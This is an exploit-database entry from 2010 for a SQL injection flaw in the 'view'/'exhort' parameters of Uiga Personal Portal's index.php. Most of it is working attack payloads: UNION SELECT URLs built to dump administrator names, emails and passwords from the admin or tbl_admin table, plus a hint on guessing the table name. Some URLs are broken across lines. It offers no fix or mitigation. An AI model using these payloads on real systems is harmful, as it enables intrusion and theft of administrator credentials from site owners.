Uiga Personal Portal - 'index.php' 'view' SQL Injection

EDB-ID:

12399


Platform:

PHP

Published:

2010-04-26

# Exploit Title: Uiga Personal Portal index.php (view) SQL Injection
Vulnerability
# Date: 27-4-2010
# Author: 41.w4r10r
# Software Link :
http://www.scriptdevelopers.net/download/uigapersonalportal.zip
# Version: Web Application
# Tested on: Apcahe/Unix
# CVE : [if exists]
# Dork :
# Code :



Exploited Link :

http://[site]/uigaportal/index.php?view=ar_det&exhort=-36'

Examples :

http://[site]/product/demo/uigaportal/index.php?view=ar_det&exhort=-36+union+select+all+1,2,3,4,5,6,gr

oup_concat(admin_name,0x3a,admin_password),8,9,10,11+from+admin--

http://[site]/index.php?view=ar_det&exhort=-36+union+select+all+1,2,3,4,5,6,group_concat(admin_ema

il,0x3a,admin_password),8,9,10,11+from+tbl_admin--

Important: Sometimes the table name is administrators and sometimes its
admin